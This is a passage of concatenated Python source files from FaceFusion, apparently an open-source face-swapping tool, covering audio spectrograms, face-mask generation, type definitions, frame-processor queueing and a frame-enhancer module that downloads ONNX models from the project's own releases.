mel_filter_bank = numpy.zeros((mel_filter_total, mel_bin_total // 2 + 1)) mel_frequency_range = numpy.linspace(convert_hertz_to_mel(min_frequency), convert_hertz_to_mel(max_frequency), mel_filter_total + 2) indices = numpy.floor((mel_bin_total + 1) * convert_mel_to_hertz(mel_frequency_range) / sample_rate).astype(numpy.int16) for index in range(mel_filter_total): start = indices[index] end = indices[index + 1] mel_filter_bank[index, start:end] = scipy.signal.windows.triang(end - start) return mel_filter_bank def create_spectrogram(audio : Audio) -> Spectrogram: mel_bin_total = 800 mel_bin_overlap = 600 mel_filter_bank = create_mel_filter_bank() spectrogram = scipy.signal.stft(audio, nperseg = mel_bin_total, nfft = mel_bin_total, noverlap = mel_bin_overlap)[2] spectrogram = numpy.dot(mel_filter_bank, numpy.abs(spectrogram)) return spectrogram def extract_audio_frames(spectrogram : Spectrogram, fps : Fps) -> List[AudioFrame]: mel_filter_total = 80 step_size = 16 audio_frames = [] indices = numpy.arange(0, spectrogram.shape[1], mel_filter_total / fps).astype(numpy.int16) indices = indices[indices >= step_size] for index in indices: start = max(0, index - step_size) audio_frames.append(spectrogram[:, start:index]) return audio_frames File: facefusion/statistics.py from typing import Any, Dict import numpy import facefusion.globals from facefusion.face_store import FACE_STORE from facefusion.typing import FaceSet from facefusion import logger def create_statistics(static_faces : FaceSet) -> Dict[str, Any]: face_detector_score_list = [] face_landmarker_score_list = [] statistics =\ { 'min_face_detector_score': 0, 'min_face_landmarker_score': 0, 'max_face_detector_score': 0, 'max_face_landmarker_score': 0, 'average_face_detector_score': 0, 'average_face_landmarker_score': 0, 'total_face_landmark_5_fallbacks': 0, 'total_frames_with_faces': 0, 'total_faces': 0 } for faces in static_faces.values(): statistics['total_frames_with_faces'] = statistics.get('total_frames_with_faces') + 1 for face in faces: statistics['total_faces'] = statistics.get('total_faces') + 1 face_detector_score_list.append(face.scores.get('detector')) face_landmarker_score_list.append(face.scores.get('landmarker')) if numpy.array_equal(face.landmarks.get('5'), face.landmarks.get('5/68')): statistics['total_face_landmark_5_fallbacks'] = statistics.get('total_face_landmark_5_fallbacks') + 1 if face_detector_score_list: statistics['min_face_detector_score'] = round(min(face_detector_score_list), 2) statistics['max_face_detector_score'] = round(max(face_detector_score_list), 2) statistics['average_face_detector_score'] = round(numpy.mean(face_detector_score_list), 2) if face_landmarker_score_list: statistics['min_face_landmarker_score'] = round(min(face_landmarker_score_list), 2) statistics['max_face_landmarker_score'] = round(max(face_landmarker_score_list), 2) statistics['average_face_landmarker_score'] = round(numpy.mean(face_landmarker_score_list), 2) return statistics def conditional_log_statistics() -> None: if facefusion.globals.log_level == 'debug': statistics = create_statistics(FACE_STORE.get('static_faces')) for name, value in statistics.items(): logger.debug(str(name) + ': ' + str(value), __name__.upper()) File: facefusion/choices.py from typing import List, Dict from facefusion.typing import VideoMemoryStrategy, FaceSelectorMode, FaceAnalyserOrder, FaceAnalyserAge, FaceAnalyserGender, FaceDetectorModel, FaceMaskType, FaceMaskRegion, TempFrameFormat, OutputVideoEncoder, OutputVideoPreset from facefusion.common_helper import create_int_range, create_float_range video_memory_strategies : List[VideoMemoryStrategy] = [ 'strict', 'moderate', 'tolerant' ] face_analyser_orders : List[FaceAnalyserOrder] = [ 'left-right', 'right-left', 'top-bottom', 'bottom-top', 'small-large', 'large-small', 'best-worst', 'worst-best' ] face_analyser_ages : List[FaceAnalyserAge] = [ 'child', 'teen', 'adult', 'senior' ] face_analyser_genders : List[FaceAnalyserGender] = [ 'female', 'male' ] face_detector_set : Dict[FaceDetectorModel, List[str]] =\ { 'many': [ '640x640' ], 'retinaface': [ '160x160', '320x320', '480x480', '512x512', '640x640' ], 'scrfd': [ '160x160', '320x320', '480x480', '512x512', '640x640' ], 'yoloface': [ '640x640' ], 'yunet': [ '160x160', '320x320', '480x480', '512x512', '640x640', '768x768', '960x960', '1024x1024' ] } face_selector_modes : List[FaceSelectorMode] = [ 'many', 'one', 'reference' ] face_mask_types : List[FaceMaskType] = [ 'box', 'occlusion', 'region' ] face_mask_regions : List[FaceMaskRegion] = [ 'skin', 'left-eyebrow', 'right-eyebrow', 'left-eye', 'right-eye', 'glasses', 'nose', 'mouth', 'upper-lip', 'lower-lip' ] temp_frame_formats : List[TempFrameFormat] = [ 'bmp', 'jpg', 'png' ] output_video_encoders : List[OutputVideoEncoder] = [ 'libx264', 'libx265', 'libvpx-vp9', 'h264_nvenc', 'hevc_nvenc', 'h264_amf', 'hevc_amf' ] output_video_presets : List[OutputVideoPreset] = [ 'ultrafast', 'superfast', 'veryfast', 'faster', 'fast', 'medium', 'slow', 'slower', 'veryslow' ] image_template_sizes : List[float] = [ 0.25, 0.5, 0.75, 1, 1.5, 2, 2.5, 3, 3.5, 4 ] video_template_sizes : List[int] = [ 240, 360, 480, 540, 720, 1080, 1440, 2160, 4320 ] execution_thread_count_range : List[int] = create_int_range(1, 128, 1) execution_queue_count_range : List[int] = create_int_range(1, 32, 1) system_memory_limit_range : List[int] = create_int_range(0, 128, 1) face_detector_score_range : List[float] = create_float_range(0.0, 1.0, 0.05) face_landmarker_score_range : List[float] = create_float_range(0.0, 1.0, 0.05) face_mask_blur_range : List[float] = create_float_range(0.0, 1.0, 0.05) face_mask_padding_range : List[int] = create_int_range(0, 100, 1) reference_face_distance_range : List[float] = create_float_range(0.0, 1.5, 0.05) output_image_quality_range : List[int] = create_int_range(0, 100, 1) output_video_quality_range : List[int] = create_int_range(0, 100, 1) File: facefusion/normalizer.py from typing import List, Optional import hashlib import os import facefusion.globals from facefusion.filesystem import is_directory from facefusion.typing import Padding, Fps def normalize_output_path(target_path : Optional[str], output_path : Optional[str]) -> Optional[str]: if target_path and output_path: target_name, target_extension = os.path.splitext(os.path.basename(target_path)) if is_directory(output_path): output_hash = hashlib.sha1(str(facefusion.globals.__dict__).encode('utf-8')).hexdigest()[:8] output_name = target_name + '-' + output_hash return os.path.join(output_path, output_name + target_extension) output_name, output_extension = os.path.splitext(os.path.basename(output_path)) output_directory_path = os.path.dirname(output_path) if is_directory(output_directory_path) and output_extension: return os.path.join(output_directory_path, output_name + target_extension) return None def normalize_padding(padding : Optional[List[int]]) -> Optional[Padding]: if padding and len(padding) == 1: return tuple([ padding[0] ] * 4) #type:ignore[return-value] if padding and len(padding) == 2: return tuple([ padding[0], padding[1], padding[0], padding[1] ]) #type:ignore[return-value] if padding and len(padding) == 3: return tuple([ padding[0], padding[1], padding[2], padding[1] ]) #type:ignore[return-value] if padding and len(padding) == 4: return tuple(padding) #type:ignore[return-value] return None def normalize_fps(fps : Optional[float]) -> Optional[Fps]: if fps is not None: return max(1.0, min(fps, 60.0)) return None File: facefusion/typing.py from typing import Any, Literal, Callable, List, Tuple, Dict, TypedDict from collections import namedtuple import numpy BoundingBox = numpy.ndarray[Any, Any] FaceLandmark5 = numpy.ndarray[Any, Any] FaceLandmark68 = numpy.ndarray[Any, Any] FaceLandmarkSet = TypedDict('FaceLandmarkSet', { '5' : FaceLandmark5, #type:ignore[valid-type] '5/68' : FaceLandmark5, #type:ignore[valid-type] '68' : FaceLandmark68, #type:ignore[valid-type] '68/5' : FaceLandmark68 #type:ignore[valid-type] }) Score = float FaceScoreSet = TypedDict('FaceScoreSet', { 'detector' : Score, 'landmarker' : Score }) Embedding = numpy.ndarray[Any, Any] Face = namedtuple('Face', [ 'bounding_box', 'landmarks', 'scores', 'embedding', 'normed_embedding', 'gender', 'age' ]) FaceSet = Dict[str, List[Face]] FaceStore = TypedDict('FaceStore', { 'static_faces' : FaceSet, 'reference_faces': FaceSet }) VisionFrame = numpy.ndarray[Any, Any] Mask = numpy.ndarray[Any, Any] Matrix = numpy.ndarray[Any, Any] Translation = numpy.ndarray[Any, Any] AudioBuffer = bytes Audio = numpy.ndarray[Any, Any] AudioChunk = numpy.ndarray[Any, Any] AudioFrame = numpy.ndarray[Any, Any] Spectrogram = numpy.ndarray[Any, Any] MelFilterBank = numpy.ndarray[Any, Any] Fps = float Padding = Tuple[int, int, int, int] Resolution = Tuple[int, int] ProcessState = Literal['checking', 'processing', 'stopping', 'pending'] QueuePayload = TypedDict('QueuePayload', { 'frame_number' : int, 'frame_path' : str }) UpdateProgress = Callable[[int], None] ProcessFrames = Callable[[List[str], List[QueuePayload], UpdateProgress], None] WarpTemplate = Literal['arcface_112_v1', 'arcface_112_v2', 'arcface_128_v2', 'ffhq_512'] WarpTemplateSet = Dict[WarpTemplate, numpy.ndarray[Any, Any]] ProcessMode = Literal['output', 'preview', 'stream'] LogLevel = Literal['error', 'warn', 'info', 'debug'] VideoMemoryStrategy = Literal['strict', 'moderate', 'tolerant'] FaceSelectorMode = Literal['many', 'one', 'reference'] FaceAnalyserOrder = Literal['left-right', 'right-left', 'top-bottom', 'bottom-top', 'small-large', 'large-small', 'best-worst', 'worst-best'] FaceAnalyserAge = Literal['child', 'teen', 'adult', 'senior'] FaceAnalyserGender = Literal['female', 'male'] FaceDetectorModel = Literal['many', 'retinaface', 'scrfd', 'yoloface', 'yunet'] FaceDetectorTweak = Literal['low-luminance', 'high-luminance'] FaceRecognizerModel = Literal['arcface_blendswap', 'arcface_inswapper', 'arcface_simswap', 'arcface_uniface'] FaceMaskType = Literal['box', 'occlusion', 'region'] FaceMaskRegion = Literal['skin', 'left-eyebrow', 'right-eyebrow', 'left-eye', 'right-eye', 'glasses', 'nose', 'mouth', 'upper-lip', 'lower-lip'] TempFrameFormat = Literal['jpg', 'png', 'bmp'] OutputVideoEncoder = Literal['libx264', 'libx265', 'libvpx-vp9', 'h264_nvenc', 'hevc_nvenc', 'h264_amf', 'hevc_amf'] OutputVideoPreset = Literal['ultrafast', 'superfast', 'veryfast', 'faster', 'fast', 'medium', 'slow', 'slower', 'veryslow'] ModelValue = Dict[str, Any] ModelSet = Dict[str, ModelValue] OptionsWithModel = TypedDict('OptionsWithModel', { 'model' : ModelValue }) ValueAndUnit = TypedDict('ValueAndUnit', { 'value' : str, 'unit' : str }) ExecutionDeviceFramework = TypedDict('ExecutionDeviceFramework', { 'name' : str, 'version' : str }) ExecutionDeviceProduct = TypedDict('ExecutionDeviceProduct', { 'vendor' : str, 'name' : str }) ExecutionDeviceVideoMemory = TypedDict('ExecutionDeviceVideoMemory', { 'total' : ValueAndUnit, 'free' : ValueAndUnit }) ExecutionDeviceUtilization = TypedDict('ExecutionDeviceUtilization', { 'gpu' : ValueAndUnit, 'memory' : ValueAndUnit }) ExecutionDevice = TypedDict('ExecutionDevice', { 'driver_version' : str, 'framework' : ExecutionDeviceFramework, 'product' : ExecutionDeviceProduct, 'video_memory' : ExecutionDeviceVideoMemory, 'utilization' : ExecutionDeviceUtilization }) File: facefusion/thread_helper.py from typing import List, Union, ContextManager import threading from contextlib import nullcontext THREAD_LOCK : threading.Lock = threading.Lock() THREAD_SEMAPHORE : threading.Semaphore = threading.Semaphore() NULL_CONTEXT : ContextManager[None] = nullcontext() def thread_lock() -> threading.Lock: return THREAD_LOCK def thread_semaphore() -> threading.Semaphore: return THREAD_SEMAPHORE def conditional_thread_semaphore(execution_providers : List[str]) -> Union[threading.Semaphore, ContextManager[None]]: if 'DmlExecutionProvider' in execution_providers: return THREAD_SEMAPHORE return NULL_CONTEXT File: facefusion/face_masker.py from typing import Any, Dict, List from cv2.typing import Size from functools import lru_cache from time import sleep import cv2 import numpy import onnxruntime import facefusion.globals from facefusion import process_manager from facefusion.thread_helper import thread_lock, conditional_thread_semaphore from facefusion.typing import FaceLandmark68, VisionFrame, Mask, Padding, FaceMaskRegion, ModelSet from facefusion.execution import apply_execution_provider_options from facefusion.filesystem import resolve_relative_path, is_file from facefusion.download import conditional_download FACE_OCCLUDER = None FACE_PARSER = None MODELS : ModelSet =\ { 'face_occluder': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/face_occluder.onnx', 'path': resolve_relative_path('../.assets/models/face_occluder.onnx') }, 'face_parser': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/face_parser.onnx', 'path': resolve_relative_path('../.assets/models/face_parser.onnx') } } FACE_MASK_REGIONS : Dict[FaceMaskRegion, int] =\ { 'skin': 1, 'left-eyebrow': 2, 'right-eyebrow': 3, 'left-eye': 4, 'right-eye': 5, 'glasses': 6, 'nose': 10, 'mouth': 11, 'upper-lip': 12, 'lower-lip': 13 } def get_face_occluder() -> Any: global FACE_OCCLUDER with thread_lock(): while process_manager.is_checking(): sleep(0.5) if FACE_OCCLUDER is None: model_path = MODELS.get('face_occluder').get('path') FACE_OCCLUDER = onnxruntime.InferenceSession(model_path, providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) return FACE_OCCLUDER def get_face_parser() -> Any: global FACE_PARSER with thread_lock(): while process_manager.is_checking(): sleep(0.5) if FACE_PARSER is None: model_path = MODELS.get('face_parser').get('path') FACE_PARSER = onnxruntime.InferenceSession(model_path, providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) return FACE_PARSER def clear_face_occluder() -> None: global FACE_OCCLUDER FACE_OCCLUDER = None def clear_face_parser() -> None: global FACE_PARSER FACE_PARSER = None def pre_check() -> bool: download_directory_path = resolve_relative_path('../.assets/models') model_urls =\ [ MODELS.get('face_occluder').get('url'), MODELS.get('face_parser').get('url') ] model_paths =\ [ MODELS.get('face_occluder').get('path'), MODELS.get('face_parser').get('path') ] if not facefusion.globals.skip_download: process_manager.check() conditional_download(download_directory_path, model_urls) process_manager.end() return all(is_file(model_path) for model_path in model_paths) @lru_cache(maxsize = None) def create_static_box_mask(crop_size : Size, face_mask_blur : float, face_mask_padding : Padding) -> Mask: blur_amount = int(crop_size[0] * 0.5 * face_mask_blur) blur_area = max(blur_amount // 2, 1) box_mask : Mask = numpy.ones(crop_size, numpy.float32) box_mask[:max(blur_area, int(crop_size[1] * face_mask_padding[0] / 100)), :] = 0 box_mask[-max(blur_area, int(crop_size[1] * face_mask_padding[2] / 100)):, :] = 0 box_mask[:, :max(blur_area, int(crop_size[0] * face_mask_padding[3] / 100))] = 0 box_mask[:, -max(blur_area, int(crop_size[0] * face_mask_padding[1] / 100)):] = 0 if blur_amount > 0: box_mask = cv2.GaussianBlur(box_mask, (0, 0), blur_amount * 0.25) return box_mask def create_occlusion_mask(crop_vision_frame : VisionFrame) -> Mask: face_occluder = get_face_occluder() prepare_vision_frame = cv2.resize(crop_vision_frame, face_occluder.get_inputs()[0].shape[1:3][::-1]) prepare_vision_frame = numpy.expand_dims(prepare_vision_frame, axis = 0).astype(numpy.float32) / 255 prepare_vision_frame = prepare_vision_frame.transpose(0, 1, 2, 3) with conditional_thread_semaphore(facefusion.globals.execution_providers): occlusion_mask : Mask = face_occluder.run(None, { face_occluder.get_inputs()[0].name: prepare_vision_frame })[0][0] occlusion_mask = occlusion_mask.transpose(0, 1, 2).clip(0, 1).astype(numpy.float32) occlusion_mask = cv2.resize(occlusion_mask, crop_vision_frame.shape[:2][::-1]) occlusion_mask = (cv2.GaussianBlur(occlusion_mask.clip(0, 1), (0, 0), 5).clip(0.5, 1) - 0.5) * 2 return occlusion_mask def create_region_mask(crop_vision_frame : VisionFrame, face_mask_regions : List[FaceMaskRegion]) -> Mask: face_parser = get_face_parser() prepare_vision_frame = cv2.flip(cv2.resize(crop_vision_frame, (512, 512)), 1) prepare_vision_frame = numpy.expand_dims(prepare_vision_frame, axis = 0).astype(numpy.float32)[:, :, ::-1] / 127.5 - 1 prepare_vision_frame = prepare_vision_frame.transpose(0, 3, 1, 2) with conditional_thread_semaphore(facefusion.globals.execution_providers): region_mask : Mask = face_parser.run(None, { face_parser.get_inputs()[0].name: prepare_vision_frame })[0][0] region_mask = numpy.isin(region_mask.argmax(0), [ FACE_MASK_REGIONS[region] for region in face_mask_regions ]) region_mask = cv2.resize(region_mask.astype(numpy.float32), crop_vision_frame.shape[:2][::-1]) region_mask = (cv2.GaussianBlur(region_mask.clip(0, 1), (0, 0), 5).clip(0.5, 1) - 0.5) * 2 return region_mask def create_mouth_mask(face_landmark_68 : FaceLandmark68) -> Mask: convex_hull = cv2.convexHull(face_landmark_68[numpy.r_[3:14, 31:36]].astype(numpy.int32)) mouth_mask : Mask = numpy.zeros((512, 512)).astype(numpy.float32) mouth_mask = cv2.fillConvexPoly(mouth_mask, convex_hull, 1.0) mouth_mask = cv2.erode(mouth_mask.clip(0, 1), numpy.ones((21, 3))) mouth_mask = cv2.GaussianBlur(mouth_mask, (0, 0), sigmaX = 1, sigmaY = 15) return mouth_mask File: facefusion/processors/__init__.py File: facefusion/processors/frame/globals.py from typing import List, Optional from facefusion.processors.frame.typings import FaceDebuggerItem, FaceEnhancerModel, FaceSwapperModel, FrameColorizerModel, FrameEnhancerModel, LipSyncerModel face_debugger_items : Optional[List[FaceDebuggerItem]] = None face_enhancer_model : Optional[FaceEnhancerModel] = None face_enhancer_blend : Optional[int] = None face_swapper_model : Optional[FaceSwapperModel] = None frame_colorizer_model : Optional[FrameColorizerModel] = None frame_colorizer_blend : Optional[int] = None frame_colorizer_size : Optional[str] = None frame_enhancer_model : Optional[FrameEnhancerModel] = None frame_enhancer_blend : Optional[int] = None lip_syncer_model : Optional[LipSyncerModel] = None File: facefusion/processors/frame/typings.py from typing import Literal, TypedDict from facefusion.typing import Face, FaceSet, AudioFrame, VisionFrame FaceDebuggerItem = Literal['bounding-box', 'face-landmark-5', 'face-landmark-5/68', 'face-landmark-68', 'face-landmark-68/5', 'face-mask', 'face-detector-score', 'face-landmarker-score', 'age', 'gender'] FaceEnhancerModel = Literal['codeformer', 'gfpgan_1.2', 'gfpgan_1.3', 'gfpgan_1.4', 'gpen_bfr_256', 'gpen_bfr_512', 'gpen_bfr_1024', 'gpen_bfr_2048', 'restoreformer_plus_plus'] FaceSwapperModel = Literal['blendswap_256', 'inswapper_128', 'inswapper_128_fp16', 'simswap_256', 'simswap_512_unofficial', 'uniface_256'] FrameColorizerModel = Literal['ddcolor', 'ddcolor_artistic', 'deoldify', 'deoldify_artistic', 'deoldify_stable'] FrameEnhancerModel = Literal['clear_reality_x4', 'lsdir_x4', 'nomos8k_sc_x4', 'real_esrgan_x2', 'real_esrgan_x2_fp16', 'real_esrgan_x4', 'real_esrgan_x4_fp16', 'real_hatgan_x4', 'span_kendata_x4', 'ultra_sharp_x4'] LipSyncerModel = Literal['wav2lip_gan'] FaceDebuggerInputs = TypedDict('FaceDebuggerInputs', { 'reference_faces' : FaceSet, 'target_vision_frame' : VisionFrame }) FaceEnhancerInputs = TypedDict('FaceEnhancerInputs', { 'reference_faces' : FaceSet, 'target_vision_frame' : VisionFrame }) FaceSwapperInputs = TypedDict('FaceSwapperInputs', { 'reference_faces' : FaceSet, 'source_face' : Face, 'target_vision_frame' : VisionFrame }) FrameColorizerInputs = TypedDict('FrameColorizerInputs', { 'target_vision_frame' : VisionFrame }) FrameEnhancerInputs = TypedDict('FrameEnhancerInputs', { 'target_vision_frame' : VisionFrame }) LipSyncerInputs = TypedDict('LipSyncerInputs', { 'reference_faces' : FaceSet, 'source_audio_frame' : AudioFrame, 'target_vision_frame' : VisionFrame }) File: facefusion/processors/frame/__init__.py File: facefusion/processors/frame/core.py import os import sys import importlib from concurrent.futures import ThreadPoolExecutor, as_completed from queue import Queue from types import ModuleType from typing import Any, List from tqdm import tqdm import facefusion.globals from facefusion.typing import ProcessFrames, QueuePayload from facefusion.execution import encode_execution_providers from facefusion import logger, wording FRAME_PROCESSORS_MODULES : List[ModuleType] = [] FRAME_PROCESSORS_METHODS =\ [ 'get_frame_processor', 'clear_frame_processor', 'get_options', 'set_options', 'register_args', 'apply_args', 'pre_check', 'post_check', 'pre_process', 'post_process', 'get_reference_frame', 'process_frame', 'process_frames', 'process_image', 'process_video' ] def load_frame_processor_module(frame_processor : str) -> Any: try: frame_processor_module = importlib.import_module('facefusion.processors.frame.modules.' + frame_processor) for method_name in FRAME_PROCESSORS_METHODS: if not hasattr(frame_processor_module, method_name): raise NotImplementedError except ModuleNotFoundError as exception: logger.error(wording.get('frame_processor_not_loaded').format(frame_processor = frame_processor), __name__.upper()) logger.debug(exception.msg, __name__.upper()) sys.exit(1) except NotImplementedError: logger.error(wording.get('frame_processor_not_implemented').format(frame_processor = frame_processor), __name__.upper()) sys.exit(1) return frame_processor_module def get_frame_processors_modules(frame_processors : List[str]) -> List[ModuleType]: global FRAME_PROCESSORS_MODULES if not FRAME_PROCESSORS_MODULES: for frame_processor in frame_processors: frame_processor_module = load_frame_processor_module(frame_processor) FRAME_PROCESSORS_MODULES.append(frame_processor_module) return FRAME_PROCESSORS_MODULES def clear_frame_processors_modules() -> None: global FRAME_PROCESSORS_MODULES for frame_processor_module in get_frame_processors_modules(facefusion.globals.frame_processors): frame_processor_module.clear_frame_processor() FRAME_PROCESSORS_MODULES = [] def multi_process_frames(source_paths : List[str], temp_frame_paths : List[str], process_frames : ProcessFrames) -> None: queue_payloads = create_queue_payloads(temp_frame_paths) with tqdm(total = len(queue_payloads), desc = wording.get('processing'), unit = 'frame', ascii = ' =', disable = facefusion.globals.log_level in [ 'warn', 'error' ]) as progress: progress.set_postfix( { 'execution_providers': encode_execution_providers(facefusion.globals.execution_providers), 'execution_thread_count': facefusion.globals.execution_thread_count, 'execution_queue_count': facefusion.globals.execution_queue_count }) with ThreadPoolExecutor(max_workers = facefusion.globals.execution_thread_count) as executor: futures = [] queue : Queue[QueuePayload] = create_queue(queue_payloads) queue_per_future = max(len(queue_payloads) // facefusion.globals.execution_thread_count * facefusion.globals.execution_queue_count, 1) while not queue.empty(): future = executor.submit(process_frames, source_paths, pick_queue(queue, queue_per_future), progress.update) futures.append(future) for future_done in as_completed(futures): future_done.result() def create_queue(queue_payloads : List[QueuePayload]) -> Queue[QueuePayload]: queue : Queue[QueuePayload] = Queue() for queue_payload in queue_payloads: queue.put(queue_payload) return queue def pick_queue(queue : Queue[QueuePayload], queue_per_future : int) -> List[QueuePayload]: queues = [] for _ in range(queue_per_future): if not queue.empty(): queues.append(queue.get()) return queues def create_queue_payloads(temp_frame_paths : List[str]) -> List[QueuePayload]: queue_payloads = [] temp_frame_paths = sorted(temp_frame_paths, key = os.path.basename) for frame_number, frame_path in enumerate(temp_frame_paths): frame_payload : QueuePayload =\ { 'frame_number': frame_number, 'frame_path': frame_path } queue_payloads.append(frame_payload) return queue_payloads File: facefusion/processors/frame/choices.py from typing import List from facefusion.common_helper import create_int_range from facefusion.processors.frame.typings import FaceDebuggerItem, FaceEnhancerModel, FaceSwapperModel, FrameColorizerModel, FrameEnhancerModel, LipSyncerModel face_debugger_items : List[FaceDebuggerItem] = [ 'bounding-box', 'face-landmark-5', 'face-landmark-5/68', 'face-landmark-68', 'face-landmark-68/5', 'face-mask', 'face-detector-score', 'face-landmarker-score', 'age', 'gender' ] face_enhancer_models : List[FaceEnhancerModel] = [ 'codeformer', 'gfpgan_1.2', 'gfpgan_1.3', 'gfpgan_1.4', 'gpen_bfr_256', 'gpen_bfr_512', 'gpen_bfr_1024', 'gpen_bfr_2048', 'restoreformer_plus_plus' ] face_swapper_models : List[FaceSwapperModel] = [ 'blendswap_256', 'inswapper_128', 'inswapper_128_fp16', 'simswap_256', 'simswap_512_unofficial', 'uniface_256' ] frame_colorizer_models : List[FrameColorizerModel] = [ 'ddcolor', 'ddcolor_artistic', 'deoldify', 'deoldify_artistic', 'deoldify_stable' ] frame_colorizer_sizes : List[str] = [ '192x192', '256x256', '384x384', '512x512' ] frame_enhancer_models : List[FrameEnhancerModel] = [ 'clear_reality_x4', 'lsdir_x4', 'nomos8k_sc_x4', 'real_esrgan_x2', 'real_esrgan_x2_fp16', 'real_esrgan_x4', 'real_esrgan_x4_fp16', 'real_hatgan_x4', 'span_kendata_x4', 'ultra_sharp_x4' ] lip_syncer_models : List[LipSyncerModel] = [ 'wav2lip_gan' ] face_enhancer_blend_range : List[int] = create_int_range(0, 100, 1) frame_colorizer_blend_range : List[int] = create_int_range(0, 100, 1) frame_enhancer_blend_range : List[int] = create_int_range(0, 100, 1) File: facefusion/processors/frame/modules/frame_enhancer.py from typing import Any, List, Literal, Optional from argparse import ArgumentParser from time import sleep import cv2 import numpy import onnxruntime import facefusion.globals import facefusion.processors.frame.core as frame_processors from facefusion import config, process_manager, logger, wording from facefusion.face_analyser import clear_face_analyser from facefusion.content_analyser import clear_content_analyser from facefusion.execution import apply_execution_provider_options from facefusion.normalizer import normalize_output_path from facefusion.thread_helper import thread_lock, conditional_thread_semaphore from facefusion.typing import Face, VisionFrame, UpdateProgress, ProcessMode, ModelSet, OptionsWithModel, QueuePayload from facefusion.common_helper import create_metavar from facefusion.filesystem import is_file, resolve_relative_path, is_image, is_video from facefusion.download import conditional_download, is_download_done from facefusion.vision import read_image, read_static_image, write_image, merge_tile_frames, create_tile_frames from facefusion.processors.frame.typings import FrameEnhancerInputs from facefusion.processors.frame import globals as frame_processors_globals from facefusion.processors.frame import choices as frame_processors_choices FRAME_PROCESSOR = None NAME = __name__.upper() MODELS : ModelSet =\ { 'clear_reality_x4': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/clear_reality_x4.onnx', 'path': resolve_relative_path('../.assets/models/clear_reality_x4.onnx'), 'size': (128, 8, 4), 'scale': 4 }, 'lsdir_x4': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/lsdir_x4.onnx', 'path': resolve_relative_path('../.assets/models/lsdir_x4.onnx'), 'size': (128, 8, 4), 'scale': 4 }, 'nomos8k_sc_x4': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/nomos8k_sc_x4.onnx', 'path': resolve_relative_path('../.assets/models/nomos8k_sc_x4.onnx'), 'size': (128, 8, 4), 'scale': 4 }, 'real_esrgan_x2': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/real_esrgan_x2.onnx', 'path': resolve_relative_path('../.assets/models/real_esrgan_x2.onnx'), 'size': (256, 16, 8), 'scale': 2 }, 'real_esrgan_x2_fp16': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/real_esrgan_x2_fp16.onnx', 'path': resolve_relative_path('../.assets/models/real_esrgan_x2_fp16.onnx'), 'size': (256, 16, 8), 'scale': 2 }, 'real_esrgan_x4': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/real_esrgan_x4.onnx', 'path': resolve_relative_path('../.assets/models/real_esrgan_x4.onnx'), 'size': (256, 16, 8), 'scale': 4 }, 'real_esrgan_x4_fp16': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/real_esrgan_x4_fp16.onnx', 'path': resolve_relative_path('../.assets/models/real_esrgan_x4_fp16.onnx'), 'size': (256, 16, 8), 'scale': 4 }, 'real_hatgan_x4': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/real_hatgan_x4.onnx', 'path': resolve_relative_path('../.assets/models/real_hatgan_x4.onnx'), 'size': (256, 16, 8), 'scale': 4 }, 'span_kendata_x4': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/span_kendata_x4.onnx', 'path': resolve_relative_path('../.assets/models/span_kendata_x4.onnx'), 'size': (128, 8, 4), 'scale': 4 }, 'ultra_sharp_x4': { 'url': 'https://github.com/facefusion/facefusion-assets/releases/download/models/ultra_sharp_x4.onnx', 'path': resolve_relative_path('../.assets/models/ultra_sharp_x4.onnx'), 'size': (128, 8, 4), 'scale': 4 } } OPTIONS : Optional[OptionsWithModel] = None def get_frame_processor() -> Any: global FRAME_PROCESSOR with thread_lock(): while process_manager.is_checking(): sleep(0.5) if FRAME_PROCESSOR is None: model_path = get_options('model').get('path') FRAME_PROCESSOR = onnxruntime.InferenceSession(model_path, providers = apply_execution_provider_options(facefusion.globals.execution_device_id, facefusion.globals.execution_providers)) return FRAME_PROCESSOR def clear_frame_processor() -> None: global FRAME_PROCESSOR FRAME_PROCESSOR = None def get_options(key : Literal['model']) -> Any: global OPTIONS if OPTIONS is None: OPTIONS =\ { 'model': MODELS[frame_processors_globals.frame_enhancer_model] } return OPTIONS.get(key) def set_options(key : Literal['model'], value : Any) -> None: global OPTIONS OPTIONS[key] = value def register_args(program : ArgumentParser) -> None: program.add_argument('--frame-enhancer-model', help = wording.get('help.frame_enhancer_model'), default = config.get_str_value('frame_processors.frame_enhancer_model', 'span_kendata_x4'), choices = frame_processors_choices.frame_enhancer_models) program.add_argument('--frame-enhancer-blend', help = wording.get('help.frame_enhancer_blend'), type = int, default = config.get_int_value('frame_processors.frame_enhancer_blend', '80'), choices = frame_processors_choices.frame_enhancer_blend_range, metavar = create_metavar(frame_processors_choices.frame_enhancer_blend_range)) def apply_args(program : ArgumentParser) -> None: args = program.parse_args() frame_processors_globals.frame_enhancer_model = args.frame_enhancer_model frame_processors_globals.frame_enhancer_blend = args.frame_enhancer_blend def pre_check() -> bool: download_directory_path = resolve_relative_path('../.assets/models') model_url = get_options('model').get('url') model_path = get_options('model').get('path') if not facefusion.globals.skip_download: process_manager.check() conditional_download(download_directory_path, [ model_url ]) process_manager.end() return is_file(model_path) def post_check() -> bool: model_url = get_options('model').get('url') model_path = get_options('model').get('path') if not facefusion.globals.skip_download and not is_download_done(model_url, model_path): logger.error(wording.get('model_download_not_done') + wording.get('exclamation_mark'), NAME) return False if not is_file(model_path): logger.error(wording.get('model_file_not_present') + wording.get('exclamation_mark'), NAME) return False return True def pre_process(mode : ProcessMode) -> bool: if mode in [ 'output', 'preview' ] and not is_image(facefusion.globals.target_path) and not is_video(facefusion.globals.target_path): logger.error(wording.get('select_image_or_video_target') + wording.get('exclamation_mark'), NAME) return False if mode == 'output' and not normalize_output_path(facefusion.globals.target_path, facefusion.globals.output_path): logger.error(wording.get('select_file_or_directory_output') + wording.get('exclamation_mark'), NAME) return False return True def post_process() -> None: read_static_image.cache_clear() if facefusion.globals.video_memory_strategy == 